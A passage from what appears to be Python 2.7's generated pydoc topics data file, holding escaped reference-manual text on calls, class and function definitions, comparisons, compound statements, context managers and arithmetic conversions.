unusual for both keyword arguments and the "*expression" ' 'syntax\n' 'to be used in the same call, so in practice this confusion does ' 'not\n' 'arise.\n' '\n' 'If the syntax "**expression" appears in the function call,\n' '"expression" must evaluate to a mapping, the contents of which are\n' 'treated as additional keyword arguments. In the case of a keyword\n' 'appearing in both "expression" and as an explicit keyword argument, ' 'a\n' '"TypeError" exception is raised.\n' '\n' 'Formal parameters using the syntax "*identifier" or "**identifier"\n' 'cannot be used as positional argument slots or as keyword argument\n' 'names. Formal parameters using the syntax "(sublist)" cannot be ' 'used\n' 'as keyword argument names; the outermost sublist corresponds to a\n' 'single unnamed argument slot, and the argument value is assigned ' 'to\n' 'the sublist using the usual tuple assignment rules after all other\n' 'parameter processing is done.\n' '\n' 'A call always returns some value, possibly "None", unless it raises ' 'an\n' 'exception. How this value is computed depends on the type of the\n' 'callable object.\n' '\n' 'If it is---\n' '\n' 'a user-defined function:\n' ' The code block for the function is executed, passing it the\n' ' argument list. The first thing the code block will do is bind ' 'the\n' ' formal parameters to the arguments; this is described in ' 'section\n' ' Function definitions. When the code block executes a "return"\n' ' statement, this specifies the return value of the function ' 'call.\n' '\n' 'a built-in function or method:\n' ' The result is up to the interpreter; see Built-in Functions for ' 'the\n' ' descriptions of built-in functions and methods.\n' '\n' 'a class object:\n' ' A new instance of that class is returned.\n' '\n' 'a class instance method:\n' ' The corresponding user-defined function is called, with an ' 'argument\n' ' list that is one longer than the argument list of the call: the\n' ' instance becomes the first argument.\n' '\n' 'a class instance:\n' ' The class must define a "__call__()" method; the effect is then ' 'the\n' ' same as if that method was called.\n', 'class': '\n' 'Class definitions\n' '*****************\n' '\n' 'A class definition defines a class object (see section The ' 'standard\n' 'type hierarchy):\n' '\n' ' classdef ::= "class" classname [inheritance] ":" suite\n' ' inheritance ::= "(" [expression_list] ")"\n' ' classname ::= identifier\n' '\n' 'A class definition is an executable statement. It first evaluates ' 'the\n' 'inheritance list, if present. Each item in the inheritance list\n' 'should evaluate to a class object or class type which allows\n' "subclassing. The class's suite is then executed in a new " 'execution\n' 'frame (see section Naming and binding), using a newly created ' 'local\n' 'namespace and the original global namespace. (Usually, the suite\n' "contains only function definitions.) When the class's suite " 'finishes\n' 'execution, its execution frame is discarded but its local namespace ' 'is\n' 'saved. [4] A class object is then created using the inheritance ' 'list\n' 'for the base classes and the saved local namespace for the ' 'attribute\n' 'dictionary. The class name is bound to this class object in the\n' 'original local namespace.\n' '\n' "**Programmer's note:** Variables defined in the class definition " 'are\n' 'class variables; they are shared by all instances. To create ' 'instance\n' 'variables, they can be set in a method with "self.name = value". ' 'Both\n' 'class and instance variables are accessible through the notation\n' '""self.name"", and an instance variable hides a class variable ' 'with\n' 'the same name when accessed in this way. Class variables can be ' 'used\n' 'as defaults for instance variables, but using mutable values there ' 'can\n' 'lead to unexpected results. For *new-style class*es, descriptors ' 'can\n' 'be used to create instance variables with different implementation\n' 'details.\n' '\n' 'Class definitions, like function definitions, may be wrapped by one ' 'or\n' 'more *decorator* expressions. The evaluation rules for the ' 'decorator\n' 'expressions are the same as for functions. The result must be a ' 'class\n' 'object, which is then bound to the class name.\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] The exception is propagated to the invocation stack unless\n' ' there is a "finally" clause which happens to raise another\n' ' exception. That new exception causes the old one to be lost.\n' '\n' '[2] Currently, control "flows off the end" except in the case of\n' ' an exception or the execution of a "return", "continue", or\n' ' "break" statement.\n' '\n' '[3] A string literal appearing as the first statement in the\n' ' function body is transformed into the function\'s "__doc__"\n' " attribute and therefore the function's *docstring*.\n" '\n' '[4] A string literal appearing as the first statement in the class\n' ' body is transformed into the namespace\'s "__doc__" item and\n' " therefore the class's *docstring*.\n", 'comparisons': '\n' 'Comparisons\n' '***********\n' '\n' 'Unlike C, all comparison operations in Python have the same ' 'priority,\n' 'which is lower than that of any arithmetic, shifting or ' 'bitwise\n' 'operation. Also unlike C, expressions like "a < b < c" have ' 'the\n' 'interpretation that is conventional in mathematics:\n' '\n' ' comparison ::= or_expr ( comp_operator or_expr )*\n' ' comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | ' '"!="\n' ' | "is" ["not"] | ["not"] "in"\n' '\n' 'Comparisons yield boolean values: "True" or "False".\n' '\n' 'Comparisons can be chained arbitrarily, e.g., "x < y <= z" ' 'is\n' 'equivalent to "x < y and y <= z", except that "y" is ' 'evaluated only\n' 'once (but in both cases "z" is not evaluated at all when "x < ' 'y" is\n' 'found to be false).\n' '\n' 'Formally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and ' '*op1*,\n' '*op2*, ..., *opN* are comparison operators, then "a op1 b op2 ' 'c ... y\n' 'opN z" is equivalent to "a op1 b and b op2 c and ... y opN ' 'z", except\n' 'that each expression is evaluated at most once.\n' '\n' 'Note that "a op1 b op2 c" doesn\'t imply any kind of ' 'comparison between\n' '*a* and *c*, so that, e.g., "x < y > z" is perfectly legal ' '(though\n' 'perhaps not pretty).\n' '\n' 'The forms "<>" and "!=" are equivalent; for consistency with ' 'C, "!="\n' 'is preferred; where "!=" is mentioned below "<>" is also ' 'accepted.\n' 'The "<>" spelling is considered obsolescent.\n' '\n' 'The operators "<", ">", "==", ">=", "<=", and "!=" compare ' 'the values\n' 'of two objects. The objects need not have the same type. If ' 'both are\n' 'numbers, they are converted to a common type. Otherwise, ' 'objects of\n' 'different types *always* compare unequal, and are ordered ' 'consistently\n' 'but arbitrarily. You can control comparison behavior of ' 'objects of\n' 'non-built-in types by defining a "__cmp__" method or rich ' 'comparison\n' 'methods like "__gt__", described in section Special method ' 'names.\n' '\n' '(This unusual definition of comparison was used to simplify ' 'the\n' 'definition of operations like sorting and the "in" and "not ' 'in"\n' 'operators. In the future, the comparison rules for objects ' 'of\n' 'different types are likely to change.)\n' '\n' 'Comparison of objects of the same type depends on the type:\n' '\n' '* Numbers are compared arithmetically.\n' '\n' '* Strings are compared lexicographically using the numeric\n' ' equivalents (the result of the built-in function "ord()") ' 'of their\n' ' characters. Unicode and 8-bit strings are fully ' 'interoperable in\n' ' this behavior. [4]\n' '\n' '* Tuples and lists are compared lexicographically using ' 'comparison\n' ' of corresponding elements. This means that to compare ' 'equal, each\n' ' element must compare equal and the two sequences must be of ' 'the same\n' ' type and have the same length.\n' '\n' ' If not equal, the sequences are ordered the same as their ' 'first\n' ' differing elements. For example, "cmp([1,2,x], [1,2,y])" ' 'returns\n' ' the same as "cmp(x,y)". If the corresponding element does ' 'not\n' ' exist, the shorter sequence is ordered first (for example, ' '"[1,2] <\n' ' [1,2,3]").\n' '\n' '* Mappings (dictionaries) compare equal if and only if their ' 'sorted\n' ' (key, value) lists compare equal. [5] Outcomes other than ' 'equality\n' ' are resolved consistently, but are not otherwise defined. ' '[6]\n' '\n' '* Most other objects of built-in types compare unequal unless ' 'they\n' ' are the same object; the choice whether one object is ' 'considered\n' ' smaller or larger than another one is made arbitrarily but\n' ' consistently within one execution of a program.\n' '\n' 'The operators "in" and "not in" test for collection ' 'membership. "x in\n' 's" evaluates to true if *x* is a member of the collection ' '*s*, and\n' 'false otherwise. "x not in s" returns the negation of "x in ' 's". The\n' 'collection membership test has traditionally been bound to ' 'sequences;\n' 'an object is a member of a collection if the collection is a ' 'sequence\n' 'and contains an element equal to that object. However, it ' 'make sense\n' 'for many other object types to support membership tests ' 'without being\n' 'a sequence. In particular, dictionaries (for keys) and sets ' 'support\n' 'membership testing.\n' '\n' 'For the list and tuple types, "x in y" is true if and only if ' 'there\n' 'exists an index *i* such that either "x is y[i]" or "x == ' 'y[i]" is\n' 'true.\n' '\n' 'For the Unicode and string types, "x in y" is true if and ' 'only if *x*\n' 'is a substring of *y*. An equivalent test is "y.find(x) != ' '-1".\n' 'Note, *x* and *y* need not be the same type; consequently, ' '"u\'ab\' in\n' '\'abc\'" will return "True". Empty strings are always ' 'considered to be a\n' 'substring of any other string, so """ in "abc"" will return ' '"True".\n' '\n' 'Changed in version 2.3: Previously, *x* was required to be a ' 'string of\n' 'length "1".\n' '\n' 'For user-defined classes which define the "__contains__()" ' 'method, "x\n' 'in y" is true if and only if "y.__contains__(x)" is true.\n' '\n' 'For user-defined classes which do not define "__contains__()" ' 'but do\n' 'define "__iter__()", "x in y" is true if some value "z" with ' '"x == z"\n' 'is produced while iterating over "y". If an exception is ' 'raised\n' 'during the iteration, it is as if "in" raised that ' 'exception.\n' '\n' 'Lastly, the old-style iteration protocol is tried: if a class ' 'defines\n' '"__getitem__()", "x in y" is true if and only if there is a ' 'non-\n' 'negative integer index *i* such that "x == y[i]", and all ' 'lower\n' 'integer indices do not raise "IndexError" exception. (If any ' 'other\n' 'exception is raised, it is as if "in" raised that ' 'exception).\n' '\n' 'The operator "not in" is defined to have the inverse true ' 'value of\n' '"in".\n' '\n' 'The operators "is" and "is not" test for object identity: "x ' 'is y" is\n' 'true if and only if *x* and *y* are the same object. "x is ' 'not y"\n' 'yields the inverse truth value. [7]\n', 'compound': '\n' 'Compound statements\n' '*******************\n' '\n' 'Compound statements contain (groups of) other statements; they ' 'affect\n' 'or control the execution of those other statements in some way. ' 'In\n' 'general, compound statements span multiple lines, although in ' 'simple\n' 'incarnations a whole compound statement may be contained in one ' 'line.\n' '\n' 'The "if", "while" and "for" statements implement traditional ' 'control\n' 'flow constructs. "try" specifies exception handlers and/or ' 'cleanup\n' 'code for a group of statements. Function and class definitions ' 'are\n' 'also syntactically compound statements.\n' '\n' "Compound statements consist of one or more 'clauses.' A clause\n" "consists of a header and a 'suite.' The clause headers of a\n" 'particular compound statement are all at the same indentation ' 'level.\n' 'Each clause header begins with a uniquely identifying keyword ' 'and ends\n' 'with a colon. A suite is a group of statements controlled by a\n' 'clause. A suite can be one or more semicolon-separated simple\n' 'statements on the same line as the header, following the ' "header's\n" 'colon, or it can be one or more indented statements on ' 'subsequent\n' 'lines. Only the latter form of suite can contain nested ' 'compound\n' "statements; the following is illegal, mostly because it wouldn't " 'be\n' 'clear to which "if" clause a following "else" clause would ' 'belong:\n' '\n' ' if test1: if test2: print x\n' '\n' 'Also note that the semicolon binds tighter than the colon in ' 'this\n' 'context, so that in the following example, either all or none of ' 'the\n' '"print" statements are executed:\n' '\n' ' if x < y < z: print x; print y; print z\n' '\n' 'Summarizing:\n' '\n' ' compound_stmt ::= if_stmt\n' ' | while_stmt\n' ' | for_stmt\n' ' | try_stmt\n' ' | with_stmt\n' ' | funcdef\n' ' | classdef\n' ' | decorated\n' ' suite ::= stmt_list NEWLINE | NEWLINE INDENT ' 'statement+ DEDENT\n' ' statement ::= stmt_list NEWLINE | compound_stmt\n' ' stmt_list ::= simple_stmt (";" simple_stmt)* [";"]\n' '\n' 'Note that statements always end in a "NEWLINE" possibly followed ' 'by a\n' '"DEDENT". Also note that optional continuation clauses always ' 'begin\n' 'with a keyword that cannot start a statement, thus there are no\n' 'ambiguities (the \'dangling "else"\' problem is solved in Python ' 'by\n' 'requiring nested "if" statements to be indented).\n' '\n' 'The formatting of the grammar rules in the following sections ' 'places\n' 'each clause on a separate line for clarity.\n' '\n' '\n' 'The "if" statement\n' '==================\n' '\n' 'The "if" statement is used for conditional execution:\n' '\n' ' if_stmt ::= "if" expression ":" suite\n' ' ( "elif" expression ":" suite )*\n' ' ["else" ":" suite]\n' '\n' 'It selects exactly one of the suites by evaluating the ' 'expressions one\n' 'by one until one is found to be true (see section Boolean ' 'operations\n' 'for the definition of true and false); then that suite is ' 'executed\n' '(and no other part of the "if" statement is executed or ' 'evaluated).\n' 'If all expressions are false, the suite of the "else" clause, ' 'if\n' 'present, is executed.\n' '\n' '\n' 'The "while" statement\n' '=====================\n' '\n' 'The "while" statement is used for repeated execution as long as ' 'an\n' 'expression is true:\n' '\n' ' while_stmt ::= "while" expression ":" suite\n' ' ["else" ":" suite]\n' '\n' 'This repeatedly tests the expression and, if it is true, ' 'executes the\n' 'first suite; if the expression is false (which may be the first ' 'time\n' 'it is tested) the suite of the "else" clause, if present, is ' 'executed\n' 'and the loop terminates.\n' '\n' 'A "break" statement executed in the first suite terminates the ' 'loop\n' 'without executing the "else" clause\'s suite. A "continue" ' 'statement\n' 'executed in the first suite skips the rest of the suite and goes ' 'back\n' 'to testing the expression.\n' '\n' '\n' 'The "for" statement\n' '===================\n' '\n' 'The "for" statement is used to iterate over the elements of a ' 'sequence\n' '(such as a string, tuple or list) or other iterable object:\n' '\n' ' for_stmt ::= "for" target_list "in" expression_list ":" ' 'suite\n' ' ["else" ":" suite]\n' '\n' 'The expression list is evaluated once; it should yield an ' 'iterable\n' 'object. An iterator is created for the result of the\n' '"expression_list". The suite is then executed once for each ' 'item\n' 'provided by the iterator, in the order of ascending indices. ' 'Each\n' 'item in turn is assigned to the target list using the standard ' 'rules\n' 'for assignments, and then the suite is executed. When the items ' 'are\n' 'exhausted (which is immediately when the sequence is empty), the ' 'suite\n' 'in the "else" clause, if present, is executed, and the loop\n' 'terminates.\n' '\n' 'A "break" statement executed in the first suite terminates the ' 'loop\n' 'without executing the "else" clause\'s suite. A "continue" ' 'statement\n' 'executed in the first suite skips the rest of the suite and ' 'continues\n' 'with the next item, or with the "else" clause if there was no ' 'next\n' 'item.\n' '\n' 'The suite may assign to the variable(s) in the target list; this ' 'does\n' 'not affect the next item assigned to it.\n' '\n' 'The target list is not deleted when the loop is finished, but if ' 'the\n' 'sequence is empty, it will not have been assigned to at all by ' 'the\n' 'loop. Hint: the built-in function "range()" returns a sequence ' 'of\n' 'integers suitable to emulate the effect of Pascal\'s "for i := a ' 'to b\n' 'do"; e.g., "range(3)" returns the list "[0, 1, 2]".\n' '\n' 'Note: There is a subtlety when the sequence is being modified by ' 'the\n' ' loop (this can only occur for mutable sequences, i.e. lists). ' 'An\n' ' internal counter is used to keep track of which item is used ' 'next,\n' ' and this is incremented on each iteration. When this counter ' 'has\n' ' reached the length of the sequence the loop terminates. This ' 'means\n' ' that if the suite deletes the current (or a previous) item ' 'from the\n' ' sequence, the next item will be skipped (since it gets the ' 'index of\n' ' the current item which has already been treated). Likewise, ' 'if the\n' ' suite inserts an item in the sequence before the current item, ' 'the\n' ' current item will be treated again the next time through the ' 'loop.\n' ' This can lead to nasty bugs that can be avoided by making a\n' ' temporary copy using a slice of the whole sequence, e.g.,\n' '\n' ' for x in a[:]:\n' ' if x < 0: a.remove(x)\n' '\n' '\n' 'The "try" statement\n' '===================\n' '\n' 'The "try" statement specifies exception handlers and/or cleanup ' 'code\n' 'for a group of statements:\n' '\n' ' try_stmt ::= try1_stmt | try2_stmt\n' ' try1_stmt ::= "try" ":" suite\n' ' ("except" [expression [("as" | ",") ' 'identifier]] ":" suite)+\n' ' ["else" ":" suite]\n' ' ["finally" ":" suite]\n' ' try2_stmt ::= "try" ":" suite\n' ' "finally" ":" suite\n' '\n' 'Changed in version 2.5: In previous versions of Python,\n' '"try"..."except"..."finally" did not work. "try"..."except" had ' 'to be\n' 'nested in "try"..."finally".\n' '\n' 'The "except" clause(s) specify one or more exception handlers. ' 'When no\n' 'exception occurs in the "try" clause, no exception handler is\n' 'executed. When an exception occurs in the "try" suite, a search ' 'for an\n' 'exception handler is started. This search inspects the except ' 'clauses\n' 'in turn until one is found that matches the exception. An ' 'expression-\n' 'less except clause, if present, must be last; it matches any\n' 'exception. For an except clause with an expression, that ' 'expression\n' 'is evaluated, and the clause matches the exception if the ' 'resulting\n' 'object is "compatible" with the exception. An object is ' 'compatible\n' 'with an exception if it is the class or a base class of the ' 'exception\n' 'object, or a tuple containing an item compatible with the ' 'exception.\n' '\n' 'If no except clause matches the exception, the search for an ' 'exception\n' 'handler continues in the surrounding code and on the invocation ' 'stack.\n' '[1]\n' '\n' 'If the evaluation of an expression in the header of an except ' 'clause\n' 'raises an exception, the original search for a handler is ' 'canceled and\n' 'a search starts for the new exception in the surrounding code ' 'and on\n' 'the call stack (it is treated as if the entire "try" statement ' 'raised\n' 'the exception).\n' '\n' 'When a matching except clause is found, the exception is ' 'assigned to\n' 'the target specified in that except clause, if present, and the ' 'except\n' "clause's suite is executed. All except clauses must have an\n" 'executable block. When the end of this block is reached, ' 'execution\n' 'continues normally after the entire try statement. (This means ' 'that\n' 'if two nested handlers exist for the same exception, and the ' 'exception\n' 'occurs in the try clause of the inner handler, the outer handler ' 'will\n' 'not handle the exception.)\n' '\n' "Before an except clause's suite is executed, details about the\n" 'exception are assigned to three variables in the "sys" module:\n' '"sys.exc_type" receives the object identifying the exception;\n' '"sys.exc_value" receives the exception\'s parameter;\n' '"sys.exc_traceback" receives a traceback object (see section ' 'The\n' 'standard type hierarchy) identifying the point in the program ' 'where\n' 'the exception occurred. These details are also available through ' 'the\n' '"sys.exc_info()" function, which returns a tuple "(exc_type,\n' 'exc_value, exc_traceback)". Use of the corresponding variables ' 'is\n' 'deprecated in favor of this function, since their use is unsafe ' 'in a\n' 'threaded program. As of Python 1.5, the variables are restored ' 'to\n' 'their previous values (before the call) when returning from a ' 'function\n' 'that handled an exception.\n' '\n' 'The optional "else" clause is executed if and when control flows ' 'off\n' 'the end of the "try" clause. [2] Exceptions in the "else" clause ' 'are\n' 'not handled by the preceding "except" clauses.\n' '\n' 'If "finally" is present, it specifies a \'cleanup\' handler. ' 'The "try"\n' 'clause is executed, including any "except" and "else" clauses. ' 'If an\n' 'exception occurs in any of the clauses and is not handled, the\n' 'exception is temporarily saved. The "finally" clause is ' 'executed. If\n' 'there is a saved exception, it is re-raised at the end of the\n' '"finally" clause. If the "finally" clause raises another ' 'exception or\n' 'executes a "return" or "break" statement, the saved exception ' 'is\n' 'discarded:\n' '\n' ' >>> def f():\n' ' ... try:\n' ' ... 1/0\n' ' ... finally:\n' ' ... return 42\n' ' ...\n' ' >>> f()\n' ' 42\n' '\n' 'The exception information is not available to the program ' 'during\n' 'execution of the "finally" clause.\n' '\n' 'When a "return", "break" or "continue" statement is executed in ' 'the\n' '"try" suite of a "try"..."finally" statement, the "finally" ' 'clause is\n' 'also executed \'on the way out.\' A "continue" statement is ' 'illegal in\n' 'the "finally" clause. (The reason is a problem with the current\n' 'implementation --- this restriction may be lifted in the ' 'future).\n' '\n' 'The return value of a function is determined by the last ' '"return"\n' 'statement executed. Since the "finally" clause always executes, ' 'a\n' '"return" statement executed in the "finally" clause will always ' 'be the\n' 'last one executed:\n' '\n' ' >>> def foo():\n' ' ... try:\n' " ... return 'try'\n" ' ... finally:\n' " ... return 'finally'\n" ' ...\n' ' >>> foo()\n' " 'finally'\n" '\n' 'Additional information on exceptions can be found in section\n' 'Exceptions, and information on using the "raise" statement to ' 'generate\n' 'exceptions may be found in section The raise statement.\n' '\n' '\n' 'The "with" statement\n' '====================\n' '\n' 'New in version 2.5.\n' '\n' 'The "with" statement is used to wrap the execution of a block ' 'with\n' 'methods defined by a context manager (see section With ' 'Statement\n' 'Context Managers). This allows common ' '"try"..."except"..."finally"\n' 'usage patterns to be encapsulated for convenient reuse.\n' '\n' ' with_stmt ::= "with" with_item ("," with_item)* ":" suite\n' ' with_item ::= expression ["as" target]\n' '\n' 'The execution of the "with" statement with one "item" proceeds ' 'as\n' 'follows:\n' '\n' '1. The context expression (the expression given in the ' '"with_item")\n' ' is evaluated to obtain a context manager.\n' '\n' '2. The context manager\'s "__exit__()" is loaded for later use.\n' '\n' '3. The context manager\'s "__enter__()" method is invoked.\n' '\n' '4. If a target was included in the "with" statement, the return\n' ' value from "__enter__()" is assigned to it.\n' '\n' ' Note: The "with" statement guarantees that if the ' '"__enter__()"\n' ' method returns without an error, then "__exit__()" will ' 'always be\n' ' called. Thus, if an error occurs during the assignment to ' 'the\n' ' target list, it will be treated the same as an error ' 'occurring\n' ' within the suite would be. See step 6 below.\n' '\n' '5. The suite is executed.\n' '\n' '6. The context manager\'s "__exit__()" method is invoked. If an\n' ' exception caused the suite to be exited, its type, value, ' 'and\n' ' traceback are passed as arguments to "__exit__()". Otherwise, ' 'three\n' ' "None" arguments are supplied.\n' '\n' ' If the suite was exited due to an exception, and the return ' 'value\n' ' from the "__exit__()" method was false, the exception is ' 'reraised.\n' ' If the return value was true, the exception is suppressed, ' 'and\n' ' execution continues with the statement following the "with"\n' ' statement.\n' '\n' ' If the suite was exited for any reason other than an ' 'exception, the\n' ' return value from "__exit__()" is ignored, and execution ' 'proceeds\n' ' at the normal location for the kind of exit that was taken.\n' '\n' 'With more than one item, the context managers are processed as ' 'if\n' 'multiple "with" statements were nested:\n' '\n' ' with A() as a, B() as b:\n' ' suite\n' '\n' 'is equivalent to\n' '\n' ' with A() as a:\n' ' with B() as b:\n' ' suite\n' '\n' 'Note: In Python 2.5, the "with" statement is only allowed when ' 'the\n' ' "with_statement" feature has been enabled. It is always ' 'enabled in\n' ' Python 2.6.\n' '\n' 'Changed in version 2.7: Support for multiple context ' 'expressions.\n' '\n' 'See also:\n' '\n' ' **PEP 343** - The "with" statement\n' ' The specification, background, and examples for the Python ' '"with"\n' ' statement.\n' '\n' '\n' 'Function definitions\n' '====================\n' '\n' 'A function definition defines a user-defined function object ' '(see\n' 'section The standard type hierarchy):\n' '\n' ' decorated ::= decorators (classdef | funcdef)\n' ' decorators ::= decorator+\n' ' decorator ::= "@" dotted_name ["(" [argument_list [","]] ' '")"] NEWLINE\n' ' funcdef ::= "def" funcname "(" [parameter_list] ")" ' '":" suite\n' ' dotted_name ::= identifier ("." identifier)*\n' ' parameter_list ::= (defparameter ",")*\n' ' ( "*" identifier ["," "**" identifier]\n' ' | "**" identifier\n' ' | defparameter [","] )\n' ' defparameter ::= parameter ["=" expression]\n' ' sublist ::= parameter ("," parameter)* [","]\n' ' parameter ::= identifier | "(" sublist ")"\n' ' funcname ::= identifier\n' '\n' 'A function definition is an executable statement. Its execution ' 'binds\n' 'the function name in the current local namespace to a function ' 'object\n' '(a wrapper around the executable code for the function). This\n' 'function object contains a reference to the current global ' 'namespace\n' 'as the global namespace to be used when the function is called.\n' '\n' 'The function definition does not execute the function body; this ' 'gets\n' 'executed only when the function is called. [3]\n' '\n' 'A function definition may be wrapped by one or more *decorator*\n' 'expressions. Decorator expressions are evaluated when the ' 'function is\n' 'defined, in the scope that contains the function definition. ' 'The\n' 'result must be a callable, which is invoked with the function ' 'object\n' 'as the only argument. The returned value is bound to the ' 'function name\n' 'instead of the function object. Multiple decorators are applied ' 'in\n' 'nested fashion. For example, the following code:\n' '\n' ' @f1(arg)\n' ' @f2\n' ' def func(): pass\n' '\n' 'is equivalent to:\n' '\n' ' def func(): pass\n' ' func = f1(arg)(f2(func))\n' '\n' 'When one or more top-level *parameters* have the form ' '*parameter* "="\n' '*expression*, the function is said to have "default parameter ' 'values."\n' 'For a parameter with a default value, the corresponding ' '*argument* may\n' "be omitted from a call, in which case the parameter's default " 'value is\n' 'substituted. If a parameter has a default value, all following\n' 'parameters must also have a default value --- this is a ' 'syntactic\n' 'restriction that is not expressed by the grammar.\n' '\n' '**Default parameter values are evaluated when the function ' 'definition\n' 'is executed.** This means that the expression is evaluated ' 'once, when\n' 'the function is defined, and that the same "pre-computed" value ' 'is\n' 'used for each call. This is especially important to understand ' 'when a\n' 'default parameter is a mutable object, such as a list or a ' 'dictionary:\n' 'if the function modifies the object (e.g. by appending an item ' 'to a\n' 'list), the default value is in effect modified. This is ' 'generally not\n' 'what was intended. A way around this is to use "None" as the\n' 'default, and explicitly test for it in the body of the function, ' 'e.g.:\n' '\n' ' def whats_on_the_telly(penguin=None):\n' ' if penguin is None:\n' ' penguin = []\n' ' penguin.append("property of the zoo")\n' ' return penguin\n' '\n' 'Function call semantics are described in more detail in section ' 'Calls.\n' 'A function call always assigns values to all parameters ' 'mentioned in\n' 'the parameter list, either from position arguments, from ' 'keyword\n' 'arguments, or from default values. If the form ""*identifier"" ' 'is\n' 'present, it is initialized to a tuple receiving any excess ' 'positional\n' 'parameters, defaulting to the empty tuple. If the form\n' '""**identifier"" is present, it is initialized to a new ' 'dictionary\n' 'receiving any excess keyword arguments, defaulting to a new ' 'empty\n' 'dictionary.\n' '\n' 'It is also possible to create anonymous functions (functions not ' 'bound\n' 'to a name), for immediate use in expressions. This uses lambda\n' 'expressions, described in section Lambdas. Note that the ' 'lambda\n' 'expression is merely a shorthand for a simplified function ' 'definition;\n' 'a function defined in a ""def"" statement can be passed around ' 'or\n' 'assigned to another name just like a function defined by a ' 'lambda\n' 'expression. The ""def"" form is actually more powerful since ' 'it\n' 'allows the execution of multiple statements.\n' '\n' "**Programmer's note:** Functions are first-class objects. A " '""def""\n' 'form executed inside a function definition defines a local ' 'function\n' 'that can be returned or passed around. Free variables used in ' 'the\n' 'nested function can access the local variables of the function\n' 'containing the def. See section Naming and binding for ' 'details.\n' '\n' '\n' 'Class definitions\n' '=================\n' '\n' 'A class definition defines a class object (see section The ' 'standard\n' 'type hierarchy):\n' '\n' ' classdef ::= "class" classname [inheritance] ":" suite\n' ' inheritance ::= "(" [expression_list] ")"\n' ' classname ::= identifier\n' '\n' 'A class definition is an executable statement. It first ' 'evaluates the\n' 'inheritance list, if present. Each item in the inheritance ' 'list\n' 'should evaluate to a class object or class type which allows\n' "subclassing. The class's suite is then executed in a new " 'execution\n' 'frame (see section Naming and binding), using a newly created ' 'local\n' 'namespace and the original global namespace. (Usually, the ' 'suite\n' "contains only function definitions.) When the class's suite " 'finishes\n' 'execution, its execution frame is discarded but its local ' 'namespace is\n' 'saved. [4] A class object is then created using the inheritance ' 'list\n' 'for the base classes and the saved local namespace for the ' 'attribute\n' 'dictionary. The class name is bound to this class object in ' 'the\n' 'original local namespace.\n' '\n' "**Programmer's note:** Variables defined in the class definition " 'are\n' 'class variables; they are shared by all instances. To create ' 'instance\n' 'variables, they can be set in a method with "self.name = ' 'value". Both\n' 'class and instance variables are accessible through the ' 'notation\n' '""self.name"", and an instance variable hides a class variable ' 'with\n' 'the same name when accessed in this way. Class variables can be ' 'used\n' 'as defaults for instance variables, but using mutable values ' 'there can\n' 'lead to unexpected results. For *new-style class*es, ' 'descriptors can\n' 'be used to create instance variables with different ' 'implementation\n' 'details.\n' '\n' 'Class definitions, like function definitions, may be wrapped by ' 'one or\n' 'more *decorator* expressions. The evaluation rules for the ' 'decorator\n' 'expressions are the same as for functions. The result must be a ' 'class\n' 'object, which is then bound to the class name.\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] The exception is propagated to the invocation stack unless\n' ' there is a "finally" clause which happens to raise another\n' ' exception. That new exception causes the old one to be ' 'lost.\n' '\n' '[2] Currently, control "flows off the end" except in the case ' 'of\n' ' an exception or the execution of a "return", "continue", or\n' ' "break" statement.\n' '\n' '[3] A string literal appearing as the first statement in the\n' ' function body is transformed into the function\'s "__doc__"\n' " attribute and therefore the function's *docstring*.\n" '\n' '[4] A string literal appearing as the first statement in the ' 'class\n' ' body is transformed into the namespace\'s "__doc__" item ' 'and\n' " therefore the class's *docstring*.\n", 'context-managers': '\n' 'With Statement Context Managers\n' '*******************************\n' '\n' 'New in version 2.5.\n' '\n' 'A *context manager* is an object that defines the ' 'runtime context to\n' 'be established when executing a "with" statement. The ' 'context manager\n' 'handles the entry into, and the exit from, the desired ' 'runtime context\n' 'for the execution of the block of code. Context ' 'managers are normally\n' 'invoked using the "with" statement (described in section ' 'The with\n' 'statement), but can also be used by directly invoking ' 'their methods.\n' '\n' 'Typical uses of context managers include saving and ' 'restoring various\n' 'kinds of global state, locking and unlocking resources, ' 'closing opened\n' 'files, etc.\n' '\n' 'For more information on context managers, see Context ' 'Manager Types.\n' '\n' 'object.__enter__(self)\n' '\n' ' Enter the runtime context related to this object. The ' '"with"\n' " statement will bind this method's return value to the " 'target(s)\n' ' specified in the "as" clause of the statement, if ' 'any.\n' '\n' 'object.__exit__(self, exc_type, exc_value, traceback)\n' '\n' ' Exit the runtime context related to this object. The ' 'parameters\n' ' describe the exception that caused the context to be ' 'exited. If the\n' ' context was exited without an exception, all three ' 'arguments will\n' ' be "None".\n' '\n' ' If an exception is supplied, and the method wishes to ' 'suppress the\n' ' exception (i.e., prevent it from being propagated), ' 'it should\n' ' return a true value. Otherwise, the exception will be ' 'processed\n' ' normally upon exit from this method.\n' '\n' ' Note that "__exit__()" methods should not reraise the ' 'passed-in\n' " exception; this is the caller's responsibility.\n" '\n' 'See also:\n' '\n' ' **PEP 343** - The "with" statement\n' ' The specification, background, and examples for the ' 'Python "with"\n' ' statement.\n', 'continue': '\n' 'The "continue" statement\n' '************************\n' '\n' ' continue_stmt ::= "continue"\n' '\n' '"continue" may only occur syntactically nested in a "for" or ' '"while"\n' 'loop, but not nested in a function or class definition or ' '"finally"\n' 'clause within that loop. It continues with the next cycle of ' 'the\n' 'nearest enclosing loop.\n' '\n' 'When "continue" passes control out of a "try" statement with a\n' '"finally" clause, that "finally" clause is executed before ' 'really\n' 'starting the next loop cycle.\n', 'conversions': '\n' 'Arithmetic conversions\n' '**********************\n' '\n' 'When a description of an arithmetic operator below uses the ' 'phrase\n' '"the numeric arguments are converted to a common type," the ' 'arguments\n' 'are coerced using the coercion rules listed at Coercion ' 'rules. If\n' 'both arguments are standard numeric types, the following ' 'coercions are\n' 'applied:\n' '\n' '* If either argument is a complex number, the other is ' 'converted to\n' ' complex;\n' '\n' '* otherwise, if either argument is a floating point number, ' 'the\n' ' other is converted to floating point;\n' '\n' '* otherwise, if either argument is a long integer, the other ' 'is\n' ' converted to long integer;\n' '\n' '* otherwise, both must be plain integers and no conversion ' 'is\n' ' necessary.\n' '\n' 'Some additional rules apply for certain operators (e.g., a ' 'string left\n' "argument to the '%' operator). Extensions can define their " 'own\n' 'coercions.\n', 'customization': '\n' 'Basic customization\n' '*******************\n' '\n' 'object.__new__(cls[, ...])\n' '\n' ' Called to create a new instance of class *cls*. ' '"__new__()" is a\n' ' static method (special-cased so you need not declare it ' 'as such)\n' ' that takes the class of which an instance was requested ' 'as its\n' ' first argument. The remaining 